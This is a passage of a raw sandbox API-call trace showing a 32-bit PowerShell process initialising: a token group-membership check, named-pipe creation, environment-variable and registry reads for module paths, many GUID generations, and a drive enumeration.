ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x74da00 | out: phNewToken=0x74da00*=0x648) returned 1 [0086.019] CheckTokenMembership (in: TokenHandle=0x648, SidToCheck=0x48eb8c4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x74da10 | out: IsMember=0x74da10) returned 1 [0086.019] CloseHandle (hObject=0x648) returned 1 [0086.022] CreateNamedPipeW (lpName="\\\\.\\pipe\\PSHost.132257124856212152.3372.DefaultAppDomain.powershell" (normalized: "\\device\\namedpipe\\pshost.132257124856212152.3372.defaultappdomain.powershell"), dwOpenMode=0x40080003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x8000, nInBufferSize=0x8000, nDefaultTimeOut=0x0, lpSecurityAttributes=0x74d9b4) returned 0x648 [0086.383] GetFileType (hFile=0x648) returned 0x3 [0088.804] CoTaskMemAlloc (cb=0x20c) returned 0xb30498 [0088.804] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0xb30498, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0088.804] CoTaskMemFree (pv=0xb30498) [0088.807] SetEnvironmentVariableW (lpName="PathEXT", lpValue=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 1 [0092.407] CoCreateGuid (in: pguid=0x74d860 | out: pguid=0x74d860*(Data1=0x4ba607b3, Data2=0x3c1a, Data3=0x4473, Data4=([0]=0x95, [1]=0xfa, [2]=0xb5, [3]=0xa6, [4]=0x29, [5]=0x7a, [6]=0x76, [7]=0x9))) returned 0x0 [0093.693] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0093.693] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d [0093.693] CoTaskMemFree (pv=0xaf1300) [0093.694] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x74e6bc, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e [0093.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e798 | out: phkResult=0x74e798*=0x68c) returned 0x0 [0093.695] RegQueryValueExW (in: hKey=0x68c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x74e7b4, lpData=0x0, lpcbData=0x74e7b0*=0x0 | out: lpType=0x74e7b4*=0x2, lpData=0x0, lpcbData=0x74e7b0*=0xbc) returned 0x0 [0093.695] RegQueryValueExW (in: hKey=0x68c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x74e7b4, lpData=0x4935548, lpcbData=0x74e7b0*=0xbc | out: lpType=0x74e7b4*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0x74e7b0*=0xbc) returned 0x0 [0093.695] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0x74e618, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0093.695] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0x74e618, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0093.695] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x74e618, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0093.695] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x74e618, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0093.696] RegCloseKey (hKey=0x68c) returned 0x0 [0093.696] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0x74e6bc, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0093.696] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e798 | out: phkResult=0x74e798*=0x68c) returned 0x0 [0093.697] RegQueryValueExW (in: hKey=0x68c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x74e7b4, lpData=0x0, lpcbData=0x74e7b0*=0x0 | out: lpType=0x74e7b4*=0x0, lpData=0x0, lpcbData=0x74e7b0*=0x0) returned 0x2 [0093.697] RegCloseKey (hKey=0x68c) returned 0x0 [0093.697] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0093.698] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0xaf1300 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0093.698] CoTaskMemFree (pv=0xaf1300) [0093.698] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0093.698] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0093.700] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0093.700] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="⛘·Ѩ·rogram Files (x86)") returned 0x0 [0093.700] CoTaskMemFree (pv=0xaf1300) [0093.701] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e758 | out: phkResult=0x74e758*=0x68c) returned 0x0 [0093.701] RegQueryValueExW (in: hKey=0x68c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e778, lpData=0x0, lpcbData=0x74e774*=0x0 | out: lpType=0x74e778*=0x1, lpData=0x0, lpcbData=0x74e774*=0x56) returned 0x0 [0093.701] RegQueryValueExW (in: hKey=0x68c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e778, lpData=0x493708c, lpcbData=0x74e774*=0x56 | out: lpType=0x74e778*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e774*=0x56) returned 0x0 [0093.701] RegCloseKey (hKey=0x68c) returned 0x0 [0093.701] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0x74e6a0, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0093.702] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76750000 [0093.704] GetProcAddress (hModule=0x76750000, lpProcName="IsWow64Process") returned 0x76765a20 [0093.704] GetCurrentProcess () returned 0xffffffff [0093.704] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x74e7f4 | out: Wow64Process=0x74e7f4) returned 1 [0093.704] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0093.704] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0xaf1300 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0093.707] CoTaskMemFree (pv=0xaf1300) [0093.707] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0093.707] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0093.708] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0093.905] CoTaskMemAlloc (cb=0x20c) returned 0xaf1300 [0093.905] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xaf1300, nSize=0x104 | out: lpBuffer="⛘·Ѩ·sers\\FD1HVy\\Documents") returned 0x0 [0093.905] CoTaskMemFree (pv=0xaf1300) [0094.996] EtwEventRegister (in: ProviderId=0x4952278, EnableCallback=0x4772d56, CallbackContext=0x0, RegHandle=0x4952254 | out: RegHandle=0x4952254) returned 0x0 [0094.996] EtwEventSetInformation (RegHandle=0x6fce378, InformationClass=0x54, EventInformation=0x2, InformationLength=0x4952208) returned 0x0 [0095.193] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x74e088 | out: phkResult=0x74e088*=0x694) returned 0x0 [0095.194] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e0a8, lpData=0x0, lpcbData=0x74e0a4*=0x0 | out: lpType=0x74e0a8*=0x1, lpData=0x0, lpcbData=0x74e0a4*=0x56) returned 0x0 [0095.194] RegQueryValueExW (in: hKey=0x694, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x74e0a8, lpData=0x4954da0, lpcbData=0x74e0a4*=0x56 | out: lpType=0x74e0a8*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x74e0a4*=0x56) returned 0x0 [0095.194] RegCloseKey (hKey=0x694) returned 0x0 [0095.539] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xdc71ce72, Data2=0x799a, Data3=0x41ee, Data4=([0]=0xb7, [1]=0xb8, [2]=0xa4, [3]=0x5d, [4]=0x32, [5]=0x63, [6]=0x8a, [7]=0xd2))) returned 0x0 [0095.539] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xbd4f27e6, Data2=0x43a2, Data3=0x4603, Data4=([0]=0x8d, [1]=0x3b, [2]=0xd9, [3]=0x70, [4]=0x3c, [5]=0x30, [6]=0x80, [7]=0x3b))) returned 0x0 [0095.539] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x9dc1813e, Data2=0x79eb, Data3=0x4800, Data4=([0]=0xb0, [1]=0x18, [2]=0xd1, [3]=0xb2, [4]=0x41, [5]=0x7c, [6]=0x4e, [7]=0x55))) returned 0x0 [0095.539] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x460dd7c0, Data2=0x5dd3, Data3=0x4f45, Data4=([0]=0xb0, [1]=0x40, [2]=0x4f, [3]=0xe9, [4]=0x8b, [5]=0xde, [6]=0xb7, [7]=0x6f))) returned 0x0 [0095.539] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xc06ff3b0, Data2=0x6def, Data3=0x472e, Data4=([0]=0x9e, [1]=0xb1, [2]=0x30, [3]=0x8a, [4]=0x88, [5]=0x57, [6]=0x7, [7]=0x9))) returned 0x0 [0095.540] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xab5f93e0, Data2=0xed4a, Data3=0x4808, Data4=([0]=0xae, [1]=0x69, [2]=0xcf, [3]=0x36, [4]=0xfa, [5]=0x62, [6]=0x37, [7]=0x9a))) returned 0x0 [0095.540] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x51045f1c, Data2=0xb302, Data3=0x47b9, Data4=([0]=0x8b, [1]=0x45, [2]=0x77, [3]=0x97, [4]=0xf0, [5]=0xa3, [6]=0x13, [7]=0xe5))) returned 0x0 [0095.540] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xe0b4803e, Data2=0x3258, Data3=0x42b0, Data4=([0]=0x89, [1]=0xa, [2]=0x4b, [3]=0x9, [4]=0x32, [5]=0x97, [6]=0xe1, [7]=0x56))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x8de8e083, Data2=0xc99f, Data3=0x42d7, Data4=([0]=0x84, [1]=0xab, [2]=0xb2, [3]=0xe6, [4]=0x68, [5]=0x52, [6]=0x2b, [7]=0x89))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x4a61b2fd, Data2=0x7b3b, Data3=0x4db3, Data4=([0]=0x90, [1]=0x48, [2]=0x6, [3]=0xc2, [4]=0xe1, [5]=0x42, [6]=0x91, [7]=0x27))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xf1d68927, Data2=0xfd2a, Data3=0x4477, Data4=([0]=0x8c, [1]=0x41, [2]=0x78, [3]=0x98, [4]=0x57, [5]=0x12, [6]=0x22, [7]=0xb2))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x8b5063c1, Data2=0x78ff, Data3=0x4c83, Data4=([0]=0xaa, [1]=0xc7, [2]=0x5b, [3]=0x72, [4]=0x5d, [5]=0x7, [6]=0xd9, [7]=0xf5))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x603320c7, Data2=0xee7f, Data3=0x40a1, Data4=([0]=0x87, [1]=0xfe, [2]=0x46, [3]=0x73, [4]=0x1c, [5]=0xd6, [6]=0x63, [7]=0x4d))) returned 0x0 [0095.559] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x22fa9347, Data2=0xadff, Data3=0x4889, Data4=([0]=0x8f, [1]=0x6, [2]=0x79, [3]=0xa1, [4]=0xc2, [5]=0x17, [6]=0x47, [7]=0xcc))) returned 0x0 [0095.563] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x812cb3d7, Data2=0xf8d1, Data3=0x4d43, Data4=([0]=0xa0, [1]=0x8b, [2]=0x3d, [3]=0xea, [4]=0x8f, [5]=0x2e, [6]=0x89, [7]=0xfe))) returned 0x0 [0095.563] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x22b83b5a, Data2=0x981d, Data3=0x474c, Data4=([0]=0xbe, [1]=0x8c, [2]=0x23, [3]=0xc1, [4]=0x23, [5]=0xe0, [6]=0x51, [7]=0xa7))) returned 0x0 [0095.563] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xa7a6fa36, Data2=0xb250, Data3=0x47ee, Data4=([0]=0xba, [1]=0x59, [2]=0x92, [3]=0xaa, [4]=0x34, [5]=0x71, [6]=0x4f, [7]=0x45))) returned 0x0 [0095.563] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xa703cb99, Data2=0x16a8, Data3=0x41d1, Data4=([0]=0x9a, [1]=0xc6, [2]=0x2f, [3]=0xf8, [4]=0x3c, [5]=0xd, [6]=0xa, [7]=0xd8))) returned 0x0 [0095.697] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xc55016f4, Data2=0xa939, Data3=0x48c0, Data4=([0]=0xba, [1]=0x52, [2]=0xc5, [3]=0xe0, [4]=0x61, [5]=0xee, [6]=0x3, [7]=0xff))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x727a9d6c, Data2=0xe4c2, Data3=0x4dfb, Data4=([0]=0xa2, [1]=0x80, [2]=0xac, [3]=0xa6, [4]=0xe0, [5]=0xc6, [6]=0xda, [7]=0x54))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x4614d584, Data2=0x479f, Data3=0x4276, Data4=([0]=0x8f, [1]=0x8f, [2]=0x43, [3]=0xf2, [4]=0xf3, [5]=0x2f, [6]=0xa2, [7]=0xe8))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xf2a47e75, Data2=0x154d, Data3=0x43d1, Data4=([0]=0x89, [1]=0xe5, [2]=0x59, [3]=0xf8, [4]=0x6c, [5]=0x31, [6]=0x50, [7]=0xc7))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd77edb34, Data2=0xe7eb, Data3=0x49a2, Data4=([0]=0xbd, [1]=0x75, [2]=0x36, [3]=0xcc, [4]=0x97, [5]=0xa7, [6]=0xa7, [7]=0xc))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xcbb7c0fa, Data2=0xc01a, Data3=0x4a2d, Data4=([0]=0x89, [1]=0x9d, [2]=0x6f, [3]=0xa7, [4]=0x62, [5]=0x61, [6]=0xc4, [7]=0x86))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x97b814fc, Data2=0xa559, Data3=0x48a1, Data4=([0]=0xa4, [1]=0xa, [2]=0x60, [3]=0x91, [4]=0xd5, [5]=0x1b, [6]=0x5a, [7]=0x58))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x78535848, Data2=0xd440, Data3=0x4699, Data4=([0]=0x96, [1]=0xec, [2]=0xcc, [3]=0xc4, [4]=0xed, [5]=0xb7, [6]=0xab, [7]=0xce))) returned 0x0 [0095.868] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xa7400d5b, Data2=0x85, Data3=0x4c98, Data4=([0]=0x84, [1]=0x9, [2]=0xb8, [3]=0x42, [4]=0x6c, [5]=0xd3, [6]=0xfd, [7]=0x2f))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x1ca01d08, Data2=0x4c7f, Data3=0x49f1, Data4=([0]=0x83, [1]=0xb9, [2]=0x18, [3]=0x38, [4]=0x6c, [5]=0x2c, [6]=0x88, [7]=0xe7))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x41ee6d9e, Data2=0x7210, Data3=0x44d2, Data4=([0]=0x87, [1]=0xfe, [2]=0xd4, [3]=0x91, [4]=0x3b, [5]=0x3d, [6]=0x5d, [7]=0xe6))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x107fa7d6, Data2=0x1b4d, Data3=0x46a7, Data4=([0]=0x88, [1]=0xe7, [2]=0xbd, [3]=0x65, [4]=0x84, [5]=0xf8, [6]=0x59, [7]=0x7c))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xbc648099, Data2=0x30f0, Data3=0x49c2, Data4=([0]=0xb1, [1]=0x7d, [2]=0xb9, [3]=0x55, [4]=0x2e, [5]=0xfe, [6]=0xff, [7]=0x3f))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x3461f478, Data2=0x89fe, Data3=0x4923, Data4=([0]=0x82, [1]=0x69, [2]=0xb9, [3]=0x45, [4]=0x68, [5]=0x67, [6]=0x8b, [7]=0xeb))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xb59db3a7, Data2=0xdc52, Data3=0x4b97, Data4=([0]=0xbe, [1]=0xd2, [2]=0xba, [3]=0x35, [4]=0xfd, [5]=0x44, [6]=0xd8, [7]=0xeb))) returned 0x0 [0095.869] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xb6dfc6cc, Data2=0xcc37, Data3=0x4f26, Data4=([0]=0x99, [1]=0xca, [2]=0x44, [3]=0xa4, [4]=0x12, [5]=0xae, [6]=0x7a, [7]=0x6c))) returned 0x0 [0095.880] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xca28813c, Data2=0x35fe, Data3=0x420f, Data4=([0]=0xbe, [1]=0x8b, [2]=0xbf, [3]=0xc9, [4]=0x86, [5]=0x2d, [6]=0x83, [7]=0x6e))) returned 0x0 [0095.881] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x22cd9414, Data2=0x6896, Data3=0x44fc, Data4=([0]=0x88, [1]=0x3a, [2]=0xc, [3]=0xde, [4]=0xcb, [5]=0x5e, [6]=0x22, [7]=0x22))) returned 0x0 [0095.881] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xb2215806, Data2=0x9929, Data3=0x49bc, Data4=([0]=0xa8, [1]=0xbd, [2]=0x70, [3]=0xab, [4]=0x9c, [5]=0xae, [6]=0x69, [7]=0xfa))) returned 0x0 [0096.693] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x23748cc6, Data2=0x6510, Data3=0x4b87, Data4=([0]=0x83, [1]=0x6a, [2]=0x28, [3]=0x43, [4]=0xa2, [5]=0x25, [6]=0x99, [7]=0x39))) returned 0x0 [0096.693] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x66d24edc, Data2=0x3141, Data3=0x420d, Data4=([0]=0xbc, [1]=0x8e, [2]=0x5b, [3]=0x3b, [4]=0x53, [5]=0x53, [6]=0xdd, [7]=0xb5))) returned 0x0 [0096.695] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xc96faadb, Data2=0xd6cc, Data3=0x42b8, Data4=([0]=0x9a, [1]=0xf, [2]=0xb1, [3]=0x94, [4]=0xde, [5]=0x97, [6]=0x7a, [7]=0xba))) returned 0x0 [0096.695] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd60c8673, Data2=0x81ed, Data3=0x4124, Data4=([0]=0x85, [1]=0x25, [2]=0x1f, [3]=0x6f, [4]=0xcf, [5]=0x68, [6]=0xba, [7]=0x8a))) returned 0x0 [0096.695] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xeed01cf1, Data2=0xb7f9, Data3=0x4943, Data4=([0]=0xb0, [1]=0x4f, [2]=0xdb, [3]=0xcf, [4]=0xfd, [5]=0x97, [6]=0x5e, [7]=0xf2))) returned 0x0 [0096.695] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x1b980992, Data2=0x6019, Data3=0x4336, Data4=([0]=0x98, [1]=0x14, [2]=0xd6, [3]=0xa0, [4]=0xde, [5]=0xdf, [6]=0xf6, [7]=0xcb))) returned 0x0 [0096.695] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xfffb7e66, Data2=0x1a9e, Data3=0x40b8, Data4=([0]=0xab, [1]=0xda, [2]=0x48, [3]=0xd3, [4]=0x27, [5]=0xd9, [6]=0xa0, [7]=0x66))) returned 0x0 [0096.696] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd38db30c, Data2=0x9e89, Data3=0x4e99, Data4=([0]=0x95, [1]=0x1c, [2]=0xca, [3]=0x39, [4]=0x39, [5]=0x6d, [6]=0x21, [7]=0xe5))) returned 0x0 [0096.696] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x724ebec3, Data2=0x1d23, Data3=0x4573, Data4=([0]=0xa8, [1]=0xb0, [2]=0xb7, [3]=0xbc, [4]=0xf5, [5]=0x9e, [6]=0xd7, [7]=0x45))) returned 0x0 [0097.587] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd91d061c, Data2=0x378b, Data3=0x4d9d, Data4=([0]=0x9d, [1]=0x73, [2]=0x49, [3]=0xad, [4]=0x28, [5]=0xdb, [6]=0xd5, [7]=0x9))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd4661c2b, Data2=0xd57d, Data3=0x4354, Data4=([0]=0xb3, [1]=0xf4, [2]=0xf2, [3]=0x6d, [4]=0xf0, [5]=0x15, [6]=0x7c, [7]=0x7c))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x19dcb7ee, Data2=0x15d0, Data3=0x4f79, Data4=([0]=0xb6, [1]=0xde, [2]=0x45, [3]=0xfa, [4]=0x4a, [5]=0x64, [6]=0x4b, [7]=0x2a))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xd5598901, Data2=0x7c3f, Data3=0x4202, Data4=([0]=0x99, [1]=0x60, [2]=0x7b, [3]=0xc9, [4]=0x76, [5]=0x7e, [6]=0xcb, [7]=0x6a))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xda044d27, Data2=0x6a5f, Data3=0x4330, Data4=([0]=0x8d, [1]=0x8e, [2]=0x64, [3]=0xab, [4]=0x53, [5]=0x62, [6]=0x16, [7]=0xb8))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x1d4cfd9d, Data2=0xd767, Data3=0x4fbf, Data4=([0]=0xb7, [1]=0x3c, [2]=0x1, [3]=0xa4, [4]=0x7d, [5]=0x98, [6]=0x3e, [7]=0x1e))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x953d4225, Data2=0xb7bc, Data3=0x4d9a, Data4=([0]=0xbc, [1]=0x7f, [2]=0xa8, [3]=0x28, [4]=0xe2, [5]=0xed, [6]=0x6e, [7]=0xb0))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xf724b367, Data2=0x643, Data3=0x4b96, Data4=([0]=0x88, [1]=0x47, [2]=0x56, [3]=0x87, [4]=0x56, [5]=0x58, [6]=0x28, [7]=0xc4))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x3b3015cc, Data2=0x5d19, Data3=0x496b, Data4=([0]=0xaa, [1]=0x68, [2]=0xc5, [3]=0xcb, [4]=0xe7, [5]=0x89, [6]=0xe7, [7]=0x53))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xc01750b6, Data2=0x7384, Data3=0x4204, Data4=([0]=0x9b, [1]=0x41, [2]=0x38, [3]=0x3, [4]=0xc, [5]=0x72, [6]=0xcb, [7]=0xf6))) returned 0x0 [0097.590] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x7469c5e8, Data2=0x47fb, Data3=0x4ff3, Data4=([0]=0x95, [1]=0x90, [2]=0xa6, [3]=0x60, [4]=0x56, [5]=0xee, [6]=0xd, [7]=0x31))) returned 0x0 [0097.709] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0x2754a1e8, Data2=0x3675, Data3=0x4003, Data4=([0]=0xa5, [1]=0xe7, [2]=0x98, [3]=0xb0, [4]=0x61, [5]=0x24, [6]=0x57, [7]=0x18))) returned 0x0 [0097.873] CoCreateGuid (in: pguid=0x74bf34 | out: pguid=0x74bf34*(Data1=0xbb9bcc03, Data2=0xe26f, Data3=0x4ac9, Data4=([0]=0xb7, [1]=0x18, [2]=0x2a, [3]=0xb8, [4]=0x6d, [5]=0xb5, [6]=0xaa, [7]=0x48))) returned 0x0 [0099.076] GetLogicalDrives () returned 0x4 [0099.076] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0099.076] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0099.086] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0099.086] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0099.086] 